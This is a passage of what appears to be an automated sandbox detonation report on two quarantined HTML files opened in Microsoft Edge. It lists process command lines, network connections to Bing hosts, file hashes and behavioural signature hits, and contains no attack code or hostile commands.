PID 4316 wrote to memory of 4164 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4316 wrote to memory of 4164 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4316 wrote to memory of 4164 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\imfsCjY.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8b3a246f8,0x7ff8b3a24708,0x7ff8b3a24718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 9f4a0b24e1ad3a25fc9435eb63195e60
SHA1 052b5a37605d7e0e27d8b47bf162a000850196cd
SHA256 7d70a8fc286520712421636b563e9ee32335bca9a5be764544a084c77ddd5feb
SHA512 70897560b30f7885745fede85def923fb9a4f63820e351247d5dcbe81daab9dab49c1db03b29c390f58b3907d5025737a84fff026af2372c3233bc585dcfd284

\??\pipe\LOCAL\crashpad_4316_EMVACURQLVHIMEBR

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4c9b7e612ef21ee665c70534d72524b0
SHA1 e76e22880ffa7d643933bf09544ceb23573d5add
SHA256 a64366387921aba157bba7472244791d5368aef8ecaf6472b616e1e130d7d05e
SHA512 e195e1ce5e7c06d193aa1f924d0079ea72b66eb22c3aea5b6811172251768f649368734e817996d9f0f72ddfd0e2bf2454aaee0bc650eaffd56fa125a334ae88

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\d6f1baaf-172b-462e-93b5-8eca9e1e14fa.tmp

MD5 58051c937f7e9e3d08f7dfe80400c64c
SHA1 a99a1ed118fa7858748bf578185501f7eddc74b9
SHA256 2431d1024a172fefed5f3a4e3d1b9cdcb14f2e1f668250f47fec5c8af623708c
SHA512 0231133592d6a657ab11e8597e928f8deb3b042bd486a75782afc973c55651238499dced5e0f0378003a95e603cbf7a78c98ef5e10fde849fba4b7313760e65c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c068bf3daa5d6f9a63cb766d95f4af02
SHA1 f6e8f1f45abcd18b0045e49c54bc3fe2c92d8b70
SHA256 ed1e747ee178a317308c75a0263ba4c785935ca36e96ae595a89809cebccb386
SHA512 ff46e45e06426a13f84d807efb69f2ee6212055a6a31acb3be2b43a1cf2b7c8a87aabdc9eb24cae1cf85e48edd4818715f84e97ba5b3f3f01b7a6beabf7a32b0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c289d3ff5f832ae0c6e4f49d186e55a3
SHA1 498b7f006fd79e8d766d33a9864fc4e7e5b1545d
SHA256 cfba6725f5d7a096039e919bff2835003e26d5e892056f7d6659112aa2c57a9d
SHA512 a05c5bc44190d0079ad0571af4220710c96a37fb7df2d915985160e7ee0a8a267205a21010f3a5819f7396c6b843b788fe9b0a524f6c33142c2737c054c98437

Analysis: behavioral21

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

141s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3436 wrote to memory of 1668 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 1668 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 1924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 1924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa24a546f8,0x7ffa24a54708,0x7ffa24a54718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,1254722498498580642,7100628006893330437,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,1254722498498580642,7100628006893330437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,1254722498498580642,7100628006893330437,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:8

